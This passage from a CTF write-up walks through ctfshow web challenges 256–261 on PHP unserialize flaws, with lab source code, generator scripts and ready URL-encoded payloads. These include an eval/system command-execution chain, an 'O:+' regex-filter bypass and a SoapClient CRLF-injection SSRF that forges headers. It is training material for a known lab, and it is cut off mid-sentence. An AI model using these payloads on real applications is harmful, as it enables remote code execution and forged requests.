class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkVip</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">vipOneKeyGetFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->isVip){</span><br><span class="line"><span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->username!==<span class="variable language_">$this</span>->password){</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"your flag is "</span>.<span class="variable">$flag</span>;</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip, no flag"</span>;</span><br><span class="line">}</span><br><span 
class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]); </span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">checkVip</span>()){</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">vipOneKeyGetFlag</span>();</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip,no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>This builds on the previous one and only adds the check username!==password, so we just need to change those values when generating the serialized object:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span> = <span class="string">'mumuzi'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span> = <span class="string">'0.38'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span> = <span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260104224003574.png" alt="image-20260104224003574"></p><p>Remember to change the username and password passed as parameters to match as well.</p><h1 id="web-257"><a href="#web-257" class="headerlink" title="web 257"></a>web 257</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 20:33:07</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title 
function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$class</span> = <span class="string">'info'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>=<span class="title">new</span> <span class="title">info</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">public</span> <span class="title">function</span> <span class="title">login</span>($<span class="title">u</span>,$<span class="title">p</span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 
<span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>-><span class="title">getInfo</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">class</span> <span class="title">info</span></span>{</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$user</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->user;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">backDoor</span></span>{</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$code</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">eval</span>(<span class="variable language_">$this</span>->code);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span 
class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]);</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>First, the constructor instantiates the info class:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public function __construct(){</span><br><span class="line">$this->class=new info();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Second, when the object is destroyed, __destruct calls the getInfo method:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public function __destruct(){</span><br><span class="line">$this->class->getInfo();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Here getInfo is the method defined in the info class.</p><p>What we need is to call the getInfo method of backDoor instead, because that class uses eval, which gives us command execution. So in the script, change</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">private $class = 'info';</span><br><span class="line">public function __construct(){</span><br><span class="line">$this->class=new info();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>to</p><figure 
class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">private $class = 'backDoor';</span><br><span class="line">public function __construct(){</span><br><span class="line">$this->class=new backDoor();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>then serialize again (the payload below is URL-encoded):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3</span><br><span class="line">BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A2</span><br><span class="line">3%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D</span><br></pre></td></tr></table></figure><h1 id="web-258"><a href="#web-258" class="headerlink" title="web 258"></a>web 258</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 21:38:56</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> 
<span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$class</span> = <span class="string">'info'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>=<span class="title">new</span> <span class="title">info</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">public</span> <span class="title">function</span> <span class="title">login</span>($<span class="title">u</span>,$<span class="title">p</span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>-><span class="title">getInfo</span>();</span></span><br><span class="line"><span 
class="class">}</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">class</span> <span class="title">info</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$user</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->user;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">backDoor</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$code</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">eval</span>(<span class="variable language_">$this</span>->code);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span 
class="string">'/[oc]:\d+:/i'</span>, <span class="variable">$_COOKIE</span>[<span class="string">'user'</span>])){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]);</span><br><span class="line">}</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>This only adds a filter on top of the previous challenge.</p><p>Use O:+ in place of O: the regex [oc]:\d+: does not match O:+11:, while unserialize still parses it.</p><p>The other change is that private $code became public $code, and $class is public as well.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$class</span> = <span class="string">'backDoor'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span 
class="class"><span class="keyword">class</span>=<span class="title">new</span> <span class="title">backDoor</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">class</span> <span class="title">backDoor</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$code</span> = <span class="string">'system("tac flag.php");'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">"O:"</span>,<span class="string">"O:+"</span>,<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D</span><br></pre></td></tr></table></figure><h1 id="web259"><a href="#web259" class="headerlink" title="web259"></a>web259</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$vip</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">'vip'</span>]);</span><br><span class="line"><span class="comment">//vip can get flag one key</span></span><br><span class="line"><span class="variable">$vip</span>-><span class="title function_ invoke__">getFlag</span>();</span><br><span class="line">Notice: Undefined index: vip in /<span class="keyword">var</span>/www/html/index.php on line <span class="number">6</span></span><br><span class="line">Fatal error: Uncaught <span class="built_in">Error</span>: Call to a member <span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>) <span class="title">on</span> <span class="title">bool</span> <span class="title">i</span></span></span><br><span class="line"><span class="function"><span class="title">n</span> /<span class="title">var</span>/<span class="title">www</span>/<span class="title">html</span>/<span class="title">index</span>.<span class="title">php</span>:8 <span class="title">Stack</span> <span class="title">trace</span>: #0 </span>{main} thrown in /<span class="keyword">var</span>/www/htm</span><br><span class="line">l/index.php on line <span class="number">8</span></span><br></pre></td></tr></table></figure><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#flag.php</span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$xff</span> = <span class="title function_ invoke__">explode</span>(<span class="string">','</span>, <span class="variable">$_SERVER</span>[<span class="string">'HTTP_X_FORWARDED_FOR'</span>]);</span><br><span class="line"><span class="title function_ invoke__">array_pop</span>(<span class="variable">$xff</span>);</span><br><span class="line"><span class="variable">$ip</span> = <span class="title function_ invoke__">array_pop</span>(<span class="variable">$xff</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$ip</span>!==<span class="string">'127.0.0.1'</span>){</span><br><span class="line"><span class="keyword">die</span>(<span class="string">'error'</span>);</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="variable">$token</span> = <span class="variable">$_POST</span>[<span class="string">'token'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$token</span>==<span class="string">'ctfshow'</span>){</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">'flag.txt'</span>,<span class="variable">$flag</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span 
class="meta">?></span></span><br></pre></td></tr></table></figure><p>Reference: <a href="https://zhuanlan.zhihu.com/p/80918004">https://zhuanlan.zhihu.com/p/80918004</a></p><p>Deserializing a SoapClient combined with CRLF injection can produce an arbitrary POST request.</p><p>Deserialization + __call + SoapClient + CRLF = SSRF</p><p>Use the SSRF to request flag.php, POSTing token==ctfshow with an XFF of 127.0.0.1.</p><p>Pay attention to the XFF handling: X-Forwarded-For is split into an array on <strong>,</strong>, one element is popped off, and the element that is now last is used as the IP, which is why the header below carries 127.0.0.1 twice.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ua="ctfshow\nX-Forwarded-For:127.0.0.1,127.0.0.1"</span><br></pre></td></tr></table></figure><p>Then build the POST:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ua="ctfshow\nX-Forwarded-For:127.0.0.1,127.0.0.1\nContent-Type: application/x-www-form-urlencoded\nContent-Length:13\n\ntoken=ctfshow";</span><br></pre></td></tr></table></figure><p>Note that Content-Length is 13, exactly the length of token=ctfshow, so nothing after it is read as part of the body.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">$ua="ctfshow\nX-Forwarded-For:127.0.0.1,127.0.0.1\nContent-Type: application/x-www-form-urlencoded\nContent-Length:13\n\ntoken=ctfshow";</span><br><span class="line">$client = new SoapClient(NULL,array('uri'=>"http://127.0.0.1","location"=>"http://127.0.0.1/flag.php","user_agent"=>$ua));</span><br><span class="line">echo urlencode(serialize($client));</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A16%3A%22http%3A%2F%2F127.0.0.1%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A124%3A%22ctfshow%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0AContentType%3A+application%2Fx-www-form-urlencoded%0AContent-Length%3A13%0A%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D</span><br></pre></td></tr></table></figure><p>Send this as vip=...; flag.txt is then written and can be requested directly.</p><h1 id="web-260"><a href="#web-260" class="headerlink" title="web 260"></a>web 260</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/ctfshow_i_love_36D/'</span>,<span class="title function_ invoke__">serialize</span>(<span class="variable">$_GET</span>[<span class="string">'ctfshow'</span>]))){</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>This simply means the serialized form of ctfshow has to contain /ctfshow_i_love_36D/, so it can be passed directly:</p><figure class="highlight plaintext"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow=/ctfshow_i_love_36D/</span><br></pre></td></tr></table></figure><h1 id="web261"><a href="#web261" class="headerlink" title="web261"></a>web261</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshowvip</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line"><span 
class="keyword">public</span> <span class="variable">$code</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username=<span class="variable">$u</span>;</span><br><span class="line"><span class="variable language_">$this</span>->password=<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->username!=<span class="string">''</span> || <span class="variable language_">$this</span>->password!=<span class="string">''</span>){</span><br><span class="line"><span class="keyword">die</span>(<span class="string">'error'</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">eval</span>(<span class="variable language_">$this</span>->code);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__sleep</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username=<span class="string">''</span>;</span><br><span class="line"><span class="variable language_">$this</span>->password=<span 
class="string">''</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__unserialize</span>(<span class="params"><span class="variable">$data</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username=<span class="variable">$data</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable language_">$this</span>->password=<span class="variable">$data</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="variable language_">$this</span>->code = <span class="variable language_">$this</span>->username.<span class="variable language_">$this</span>->password;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->code==<span class="number">0x36d</span>){</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$this</span>->username, <span class="variable">$this</span>->password);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">'vip'</span>]);</span><br></pre></td></tr></table></figure><p>Notice that public function __invoke() contains an eval; that is clearly what we want to reach.</p><p>Next, __destruct() performs a file write, writing password into the file named by username. Note also that the class defines __unserialize().</p><p>If both __unserialize() and __wakeup() are defined on the same object, only __unserialize() takes effect and 